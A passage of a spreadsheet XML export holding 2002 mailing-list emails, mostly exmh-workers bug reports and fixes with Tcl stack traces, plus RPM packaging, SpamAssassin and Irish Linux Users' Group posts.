\n&gt; * In the US, we are not so friendly to\n&gt; our capitalists: adverse possession is\n&gt; only supposed to take 5 years.\n&gt; \n&gt; (How much do we owe to our frontiers?\n&gt; Heck, in Egypt didn't they pretty much\n&gt; invent geometry a few millenia ago to\n&gt; keep track of their property lines?)\n&gt; \n&gt; [URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 11:01:41 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:01:41 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-2067045721P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 21 Aug 2002 10:15:18 -0500 &gt; &gt; &gt; From:  Valdis.Kletnieks@vt.edu &gt; &gt; Date:  Wed, 21 Aug 2002 02:36:56 -0400 &gt; &gt; &gt; &gt; --==_Exmh_778588528P &gt; &gt; Content-Type: text/plain; charset=us-ascii &gt; &gt;  &gt; &gt; On Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said: &gt; &gt;  &gt; &gt; &gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everyb &gt; od &gt; &gt; y's &gt; &gt; &gt; looking at a big box that has unseen and pseq in it.  Might want to add &gt; &gt; &gt; 'pseq' to the 'hide by default' list.... &gt; &gt;  &gt; &gt; Was it intended that if you added a sequence to the 'never show' list tha &gt; t &gt; &gt; it not take effect till you stopped and restarted exmh?  I added 'pseq', &gt; &gt; then hit 'save' for Preferences - didn't take effect till I restarted. &gt;  &gt; No it wasn't, and at one point it worked fine.  I'll check and see why it  &gt; stopped working. Ah....I think this may be a user error.  If you change the field in the  preferences window the variable doesn't actually change unless you press  return.  If you merely click elsewhere, nothing happens. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-2067045721P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y7llK9b4h5R0IUIRAn1UAJ9QeXRMZ2Bisp/apMknW7cTMweAeACePtOK MjOpAc2YKCDHawR3bJpOstk= =Um7T -----END PGP SIGNATURE----- --==_Exmh_-2067045721P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:54:46 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:54:46 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-2079003886P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500 &gt; &gt; &gt; From:  Chris Garrigues  &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500 &gt; &gt; &gt; &gt; &gt; From:  Robert Elz  &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700 &gt; &gt; &gt; &gt; &gt; &gt; Actually, you once could, now when I try this, entering a sequence name &gt; &gt; &gt; in the pick box, and a single message number, or a range N-N in the &gt; &gt; &gt; list of messages, and no pick attributes at all, I now get ... &gt; &gt; &gt;  &gt; &gt; &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))" &gt; &gt; &gt;     while executing &gt; &gt; &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxmsgid-$minmsgid))" &gt; &gt; &gt;     (procedure "Ftoc_FindMsg" line 46) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "Ftoc_FindMsg $msg" &gt; &gt; &gt;     (procedure "Ftoc_FindMsgs" line 5) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "Ftoc_FindMsgs $msgids" &gt; &gt; &gt;     (procedure "Ftoc_PickMsgs" line 5) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)" &gt; &gt; &gt;     (procedure "PickInner" line 13) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}" &gt; &gt; &gt;     ("uplevel" body line 1) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "uplevel #0 $cmd" &gt; &gt; &gt;     (procedure "busyCursorInner" line 8) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "busyCursorInner $cmd $widgets" &gt; &gt; &gt;     (procedure "busyCursorHack" line 32) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "busyCursorHack $args" &gt; &gt; &gt;     ("cursor" arm line 1) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "switch $busy(style) { &gt; &gt; &gt; 	icon		{busyIcon $args} &gt; &gt; &gt; 	cursorAll	{busyCursor $args} &gt; &gt; &gt; 	cursor		{busyCursorHack $args} &gt; &gt; &gt; 	default		{eval $args} &gt; &gt; &gt;     }" &gt; &gt; &gt;     (procedure "busy" line 3) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "busy PickInner $cmd $msgs" &gt; &gt; &gt;     (procedure "Pick_It" line 51) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "Pick_It" &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; ".pick.but.pick invoke" &gt; &gt; &gt;     ("uplevel" body line 1) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "uplevel #0 [list $w invoke]" &gt; &gt; &gt;     (procedure "tkButtonUp" line 7) &gt; &gt; &gt;     invoked from within &gt; &gt; &gt; "tkButtonUp .pick.but.pick &gt; &gt; &gt; " &gt; &gt; &gt;     (command bound to event) &gt; &gt; &gt;  &gt; &gt; &gt; It has been ages since I did this last though.   I tried adding a Subject &gt; &gt; &gt; to pick on (easy as I know what's in the message...) which made no difference. &gt; &gt; &gt; Looks as if something is now saying "1 hit" when before it didn't, or &gt; &gt; &gt; similar. &gt;  &gt; hmmm, that may or may not be my fault...I'll take a look at it. I can't reproduce this error. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-2079003886P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y7fGK9b4h5R0IUIRAi69AJ97NVQMDxZgE1+ym7QMU7U0tnVvfACcCXpB o4QEnD6bGam5XzzQT+ZuzYY= =NtpE -----END PGP SIGNATURE----- --==_Exmh_-2079003886P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "Harig, Mark A." &lt;maharig@idirect.net&gt;\nDate: Wed, 21 Aug 2002 10:50:40 -0400</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:50:40 -0400</t>
  </si>
  <si>
    <t>"Harig, Mark A." &lt;maharig@idirect.net&gt;</t>
  </si>
  <si>
    <t>&lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>RE: RPM's %post, %postun etc</t>
  </si>
  <si>
    <t>&gt; -----Original Message----- &gt; From: Torsten Bronger [mailto:bronger@physik.rwth-aachen.de] &gt; Sent: Wednesday, August 21, 2002 7:36 AM &gt; To: rpm-zzzlist@freshrpms.net &gt; Subject: Re: RPM's %post, %postun etc &gt;  &gt;  &gt; Halloechen! &gt;  &gt; On Mittwoch, 21. August 2002 08:37 schrieben Sie: &gt; &gt; Have you tried rebuilding your package on a system that has  &gt; a stock (or &gt; &gt; no) .rpmmacros file? Does it still build (and  &gt; install/uninstall) the way &gt; &gt; you intended it to? &gt;  &gt; It can't, because then %{texhash} is not defined.  But how  &gt; can I define a &gt; macro in the spec file? &gt;  [URL]http://www.rpm.org[/URL] &gt; The problem exists when someone wants to install many RPMs, among them &gt; mine.  Let's assume that every package that adds files to TeX's &gt; file tree runs texhash or equivalent.  This would be a desaster! &gt; There are only two solutions: (1) When installing many packages &gt; (maybe in context of a complete system installation), %post etc. &gt; are skipped and a complete update script is launched after *all* &gt; packages have been installed.  (2) I leave the taxhash thing out. &gt; But then the user would have to do it. &gt;  &gt; What's the way to go? &gt;  &gt; Tschoe, &gt; Torsten. &gt;  &gt; _______________________________________________ &gt; RPM-List mailing list  &gt; [URL]http://lists.freshrpms.net[/URL] &gt;  _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.rpm.org http://lists.freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: nan\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:47:32 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:47:32 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-2080822444P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500 &gt; &gt; &gt; From:  Chris Garrigues  &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500 &gt; &gt; &gt; &gt; &gt; From:  Robert Elz  &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700 &gt; &gt; &gt; &gt; &gt; &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen &gt; &gt; &gt; which doesn't seem to exist any more, and I'm not sure what I should replace &gt; &gt; &gt; that with.   There's obviously a way as the "Sequences" menu does this. &gt; &gt; &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting &gt; &gt; &gt; that function as well... &gt;  &gt; {Msg_Mark unseen} &gt;  &gt; I'm not sure how I missed the need to fix this in app-defaults for "Mark  &gt; Unseen".  I guess that'll be my next CVS fix. Okay, that was easy...fixed in CVS. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-2080822444P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y7YUK9b4h5R0IUIRAtwwAKCMaAHTzEMkIm1Lb7voD0y9i36uHQCcD+Ib eKMiTiUj35WyS0s1AeCQQFQ= =lW45 -----END PGP SIGNATURE----- --==_Exmh_-2080822444P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: SpamAssassin List &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Frank Pineau &lt;frank@pineaus.com&gt;\nDate: Wed, 21 Aug 2002 10:43:32 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:43:32 -0500</t>
  </si>
  <si>
    <t>SpamAssassin List &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>On Wed, 21 Aug 2002 11:34:28 -0400, you wrote:\n\n&gt;If you sign up for something, it's not spam by definition, aggressive as\n&gt;they may be.  (I told them to stop calling me, and they stopped, so ...)\n\n\nI agree.  In a way, I signed up just by buying steaks from them.  However, once\nI tell them to stop, everything after that is spam.  I told them to stop *many*\ntimes.\n\nIt's a pity, too, since they have great steaks.  Buying from them is just not\nworth having to put up with all of that clinginess.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:40:39 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:40:39 -0500</t>
  </si>
  <si>
    <t>Robert Elz &lt;kre@munnari.OZ.AU&gt;, exmh-workers@spamassassin.taint.org</t>
  </si>
  <si>
    <t>--==_Exmh_1141066573P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500 &gt; &gt; Ouch...I'll get right on it. &gt;  &gt; &gt; From:  Robert Elz  &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700 &gt; &gt; &gt; &gt; can't read "flist(totalcount,unseen)": no such element in array &gt; &gt;     while executing &gt; &gt; "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} { &gt; &gt; 	FlagInner spool iconspool labelup &gt; &gt;     } else { &gt; &gt; 	FlagInner down icondown labeldown &gt; &gt;     }" &gt; &gt;     (procedure "Flag_MsgSeen" line 3) Fixed in CVS. &gt; &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen &gt; &gt; which doesn't seem to exist any more, and I'm not sure what I should replace &gt; &gt; that with.   There's obviously a way as the "Sequences" menu does this. &gt; &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting &gt; &gt; that function as well... {Msg_Mark unseen} I'm not sure how I missed the need to fix this in app-defaults for "Mark  Unseen".  I guess that'll be my next CVS fix. &gt; &gt;   | For those who have other sequences defined, the window will widen to &gt; &gt;   | display the other sequences. &gt; &gt;  &gt; &gt; Any chance of having that lengthen instead?   I like all my exmh stuff &gt; &gt; in nice columns (fits the display better).   That is, I use the detached &gt; &gt; folder list, one column.   The main exmh window takes up full screen, &gt; &gt; top to bottom, but less than half the width, etc... I thought about that.  The first order approximation would be to just add  using pack .... -side top instead of pack ... -side left, however, since their  each a different width, it would look funny. &gt; &gt; I have space for more sequences, in the "unseen" window, as long as they &gt; &gt; remain once nice narrow window (best would be if the sequences could be &gt; &gt; ordered by some preference, then ones which didn't fit would just fall &gt; &gt; off the bottom, and not be shown). &gt; &gt;  &gt; &gt; I'd also prefer it if that window had no unusual background colouring, &gt; &gt; just one constant colour - I have been running the unseen window with &gt; &gt; background black, on a root window that is all black, with no borders or &gt; &gt; other decorations, but made "sticky" - the appearance is just like the &gt; &gt; folders with unseen messages (and their counts) are written into the &gt; &gt; root window (because it is sticky, this small display follows me around &gt; &gt; and do I can see when new mail needs processing). The background color in this window is the same as the background  color in the ftoc. &gt; &gt; I also find that I tend to have a bunch of sequences that only ever occur &gt; &gt; in one folder (some I had forgotten I ever created).  So in addition to &gt; &gt; the "sequences to always show" and "sequences to never show", a &gt; &gt; preference to only show sequences that occur in more than one folder &gt; &gt; would be useful, and then have the sequences that occor only in the &gt; &gt; folder I'm visiting appear in the list when that folder is current. &gt; &gt; This is just to keep the list size somewhat manageable while remaining &gt; &gt; productive (I quite often use a sequence to remember a particular message &gt; &gt; in a folder - the name is used only there, and only for one message, &gt; &gt; it gives me a handle on the message which remains as the folder is &gt; &gt; packed, sorted, etc). hmmm, let me think about it. &gt; &gt; I haven't updated my exmh for some time now, so I'm not sure if this &gt; &gt; next one is new, or just new since 2.5, but the Sequences menu (on the &gt; &gt; bar with New Flist Search ...) only contains "unseen" and "urgent". &gt; &gt; It would be useful if it contained all of the sequences that the folder &gt; &gt; happens to have defined.   A "New sequence" entry would also be useful &gt; &gt; (to mark the message with a sequence name that didn't previously exist, &gt; &gt; which can be done now using "Search" and the pick interface, but is &gt; &gt; clumsy that way) The only sequences that are defined there are sequences which are defined in  app-defaults-color or ~/exmh/exmh-defaults-color.  I've been thinking about  how to dynamically generate highlighting for other sequences, but haven't got  that figured out yet. &gt; &gt; Actually, you once could, now when I try this, entering a sequence name &gt; &gt; in the pick box, and a single message number, or a range N-N in the &gt; &gt; list of messages, and no pick attributes at all, I now get ... &gt; &gt;  &gt; &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))" &gt; &gt;     while executing &gt; &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($max &gt; ms &gt; &gt; gid-$minmsgid))" &gt; &gt;     (procedure "Ftoc_FindMsg" line 46) &gt; &gt;     invoked from within &gt; &gt; "Ftoc_FindMsg $msg" &gt; &gt;     (procedure "Ftoc_FindMsgs" line 5) &gt; &gt;     invoked from within &gt; &gt; "Ftoc_FindMsgs $msgids" &gt; &gt;     (procedure "Ftoc_PickMsgs" line 5) &gt; &gt;     invoked from within &gt; &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)" &gt; &gt;     (procedure "PickInner" line 13) &gt; &gt;     invoked from within &gt; &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}" &gt; &gt;     ("uplevel" body line 1) &gt; &gt;     invoked from within &gt; &gt; "uplevel #0 $cmd" &gt; &gt;     (procedure "busyCursorInner" line 8) &gt; &gt;     invoked from within &gt; &gt; "busyCursorInner $cmd $widgets" &gt; &gt;     (procedure "busyCursorHack" line 32) &gt; &gt;     invoked from within &gt; &gt; "busyCursorHack $args" &gt; &gt;     ("cursor" arm line 1) &gt; &gt;     invoked from within &gt; &gt; "switch $busy(style) { &gt; &gt; 	icon		{busyIcon $args} &gt; &gt; 	cursorAll	{busyCursor $args} &gt; &gt; 	cursor		{busyCursorHack $args} &gt; &gt; 	default		{eval $args} &gt; &gt;     }" &gt; &gt;     (procedure "busy" line 3) &gt; &gt;     invoked from within &gt; &gt; "busy PickInner $cmd $msgs" &gt; &gt;     (procedure "Pick_It" line 51) &gt; &gt;     invoked from within &gt; &gt; "Pick_It" &gt; &gt;     invoked from within &gt; &gt; ".pick.but.pick invoke" &gt; &gt;     ("uplevel" body line 1) &gt; &gt;     invoked from within &gt; &gt; "uplevel #0 [list $w invoke]" &gt; &gt;     (procedure "tkButtonUp" line 7) &gt; &gt;     invoked from within &gt; &gt; "tkButtonUp .pick.but.pick &gt; &gt; " &gt; &gt;     (command bound to event) &gt; &gt;  &gt; &gt; It has been ages since I did this last though.   I tried adding a Subject &gt; &gt; to pick on (easy as I know what's in the message...) which made no differ &gt; en &gt; &gt; ce. &gt; &gt; Looks as if something is now saying "1 hit" when before it didn't, or &gt; &gt; similar. hmmm, that may or may not be my fault...I'll take a look at it. &gt; &gt;   | I've also changed the ftoc colorization as discussed briefly on the l &gt; is &gt; &gt; t a  &gt; &gt;   | week or so ago. &gt; &gt;  &gt; &gt; Any chance of making the current message a little brighter background? &gt; &gt; Just to make it stand out a fraction more than it does (maybe this is &gt; &gt; more apparent to me than many, as I use very small fonts everywhere, &gt; &gt; the background of the ftoc line isn't very wide). I don't see any reason why not.  Experiment and let me know what works for you. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1141066573P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y7R3K9b4h5R0IUIRAvJfAJoDZLxM2iVMWeUGj9DG/oZrYYpsMACfZkY3 m1ILEOc5OmYxICv/ifINPxY= =3Rdb -----END PGP SIGNATURE----- --==_Exmh_1141066573P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 21 Aug 2002 10:38:04 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:38:04 +0200</t>
  </si>
  <si>
    <t>Re: advice on 7.3.92 to 7.3.93, and Apt compiling</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt; On Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou  &gt; wrote: &gt;  &gt; [snipped] &gt;  &gt; &gt; Then why bother : The new Red Hat Linux beta "(null)" is now available &gt; &gt; and should be announced anytime now. It contains rpm 4.1-0.81. &gt; &gt;  &gt; &gt; You can grab it from here : &gt; &gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/ &gt;  &gt;     What's the official "apt" line for it?  Is it just 7.4 instead of &gt;     7.3, or did they make this one 8.0? This is a beta, probably of 8.0 although it's numbered 7.3.94. As such, I've set up no apt repository for it, although you may find a few of my packages recompiled for it under the /pub/freshrpms/null/ directory of my ftp server. Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug &lt;ilug@linux.ie&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 21 Aug 2002 10:27:29 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:27:29 +0100</t>
  </si>
  <si>
    <t>ilug &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Gobe going GPL</t>
  </si>
  <si>
    <t>I missed this previously, but\nthe Gobe productive office suite\n(available for Linux and Windows)\nis going GPL.\n\n[URL]http://www.theregister.co.uk[/URL]\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.theregister.co.uk http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:17:45 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:17:45 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-195849857P Content-Type: text/plain; charset=us-ascii Ouch...I'll get right on it. &gt; From:  Robert Elz  &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700 &gt; &gt;     Date:        Tue, 20 Aug 2002 17:27:47 -0500 &gt;     From:        Chris Garrigues  &gt;     Message-ID:  &lt;1029882468.3116.TMDA@deepeddy.vircio.com&gt; &gt;  &gt;  &gt;   | I'm hoping that all people with no additional sequences will notice are &gt;   | purely cosmetic changes. &gt;  &gt; Well, first, when exmh (the latest one with your changes) starts, I get... &gt;  &gt; can't read "flist(totalcount,unseen)": no such element in array &gt;     while executing &gt; "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} { &gt; 	FlagInner spool iconspool labelup &gt;     } else { &gt; 	FlagInner down icondown labeldown &gt;     }" &gt;     (procedure "Flag_MsgSeen" line 3) &gt;     invoked from within &gt; "Flag_MsgSeen" &gt;     (procedure "MsgSeen" line 8) &gt;     invoked from within &gt; "MsgSeen $msgid" &gt;     (procedure "MsgShow" line 12) &gt;     invoked from within &gt; "MsgShow $msgid" &gt;     (procedure "MsgChange" line 17) &gt;     invoked from within &gt; "MsgChange 4862 show" &gt;     invoked from within &gt; "time [list MsgChange $msgid $show" &gt;     (procedure "Msg_Change" line 3) &gt;     invoked from within &gt; "Msg_Change $msg(id) $show" &gt;     (procedure "Msg_Show" line 7) &gt;     invoked from within &gt; "Msg_Show cur" &gt;     ("eval" body line 1) &gt;     invoked from within &gt; "eval $msgShowProc" &gt;     (procedure "FolderChange" line 55) &gt;     invoked from within &gt; "FolderChange inbox {Msg_Show cur}" &gt;     invoked from within &gt; "time [list  FolderChange $folder $msgShowProc" &gt;     (procedure "Folder_Change" line 3) &gt;     invoked from within &gt; "Folder_Change $exmh(folder)" &gt;     (procedure "Exmh" line 101) &gt;     invoked from within &gt; "Exmh" &gt;     ("after" script) &gt;  &gt; which is probably related to my not having an "unseen" sequence anywhere &gt; (certainly not in inbox) - I read all of my outstanding mail before I &gt; tried this new exmh ... &gt;  &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen &gt; which doesn't seem to exist any more, and I'm not sure what I should replac &gt; e &gt; that with.   There's obviously a way as the "Sequences" menu does this. &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting &gt; that function as well... &gt;  &gt;   | For those who have other sequences defined, the window will widen to &gt;   | display the other sequences. &gt;  &gt; Any chance of having that lengthen instead?   I like all my exmh stuff &gt; in nice columns (fits the display better).   That is, I use the detached &gt; folder list, one column.   The main exmh window takes up full screen, &gt; top to bottom, but less than half the width, etc... &gt;  &gt; I have space for more sequences, in the "unseen" window, as long as they &gt; remain once nice narrow window (best would be if the sequences could be &gt; ordered by some preference, then ones which didn't fit would just fall &gt; off the bottom, and not be shown). &gt;  &gt; I'd also prefer it if that window had no unusual background colouring, &gt; just one constant colour - I have been running the unseen window with &gt; background black, on a root window that is all black, with no borders or &gt; other decorations, but made "sticky" - the appearance is just like the &gt; folders with unseen messages (and their counts) are written into the &gt; root window (because it is sticky, this small display follows me around &gt; and do I can see when new mail needs processing). &gt;  &gt; I also find that I tend to have a bunch of sequences that only ever occur &gt; in one folder (some I had forgotten I ever created).  So in addition to &gt; the "sequences to always show" and "sequences to never show", a &gt; preference to only show sequences that occur in more than one folder &gt; would be useful, and then have the sequences that occor only in the &gt; folder I'm visiting appear in the list when that folder is current. &gt; This is just to keep the list size somewhat manageable while remaining &gt; productive (I quite often use a sequence to remember a particular message &gt; in a folder - the name is used only there, and only for one message, &gt; it gives me a handle on the message which remains as the folder is &gt; packed, sorted, etc). &gt;  &gt; I haven't updated my exmh for some time now, so I'm not sure if this &gt; next one is new, or just new since 2.5, but the Sequences menu (on the &gt; bar with New Flist Search ...) only contains "unseen" and "urgent". &gt; It would be useful if it contained all of the sequences that the folder &gt; happens to have defined.   A "New sequence" entry would also be useful &gt; (to mark the message with a sequence name that didn't previously exist, &gt; which can be done now using "Search" and the pick interface, but is &gt; clumsy that way) &gt;  &gt; Actually, you once could, now when I try this, entering a sequence name &gt; in the pick box, and a single message number, or a range N-N in the &gt; list of messages, and no pick attributes at all, I now get ... &gt;  &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))" &gt;     while executing &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxms &gt; gid-$minmsgid))" &gt;     (procedure "Ftoc_FindMsg" line 46) &gt;     invoked from within &gt; "Ftoc_FindMsg $msg" &gt;     (procedure "Ftoc_FindMsgs" line 5) &gt;     invoked from within &gt; "Ftoc_FindMsgs $msgids" &gt;     (procedure "Ftoc_PickMsgs" line 5) &gt;     invoked from within &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)" &gt;     (procedure "PickInner" line 13) &gt;     invoked from within &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}" &gt;     ("uplevel" body line 1) &gt;     invoked from within &gt; "uplevel #0 $cmd" &gt;     (procedure "busyCursorInner" line 8) &gt;     invoked from within &gt; "busyCursorInner $cmd $widgets" &gt;     (procedure "busyCursorHack" line 32) &gt;     invoked from within &gt; "busyCursorHack $args" &gt;     ("cursor" arm line 1) &gt;     invoked from within &gt; "switch $busy(style) { &gt; 	icon		{busyIcon $args} &gt; 	cursorAll	{busyCursor $args} &gt; 	cursor		{busyCursorHack $args} &gt; 	default		{eval $args} &gt;     }" &gt;     (procedure "busy" line 3) &gt;     invoked from within &gt; "busy PickInner $cmd $msgs" &gt;     (procedure "Pick_It" line 51) &gt;     invoked from within &gt; "Pick_It" &gt;     invoked from within &gt; ".pick.but.pick invoke" &gt;     ("uplevel" body line 1) &gt;     invoked from within &gt; "uplevel #0 [list $w invoke]" &gt;     (procedure "tkButtonUp" line 7) &gt;     invoked from within &gt; "tkButtonUp .pick.but.pick &gt; " &gt;     (command bound to event) &gt;  &gt; It has been ages since I did this last though.   I tried adding a Subject &gt; to pick on (easy as I know what's in the message...) which made no differen &gt; ce. &gt; Looks as if something is now saying "1 hit" when before it didn't, or &gt; similar. &gt;  &gt;   | I've also changed the ftoc colorization as discussed briefly on the lis &gt; t a  &gt;   | week or so ago. &gt;  &gt; Any chance of making the current message a little brighter background? &gt; Just to make it stand out a fraction more than it does (maybe this is &gt; more apparent to me than many, as I use very small fonts everywhere, &gt; the background of the ftoc line isn't very wide). &gt;  &gt; Hope this helps. &gt;  &gt; kre &gt;  &gt;  &gt;  &gt; _______________________________________________ &gt; Exmh-workers mailing list &gt; Exmh-workers@redhat.com &gt; [URL]https://listman.redhat.com[/URL] --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-195849857P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y68ZK9b4h5R0IUIRAniQAJ0Xp6L4Dh32pMeWnpt5C8+lbBuELQCdH1aV 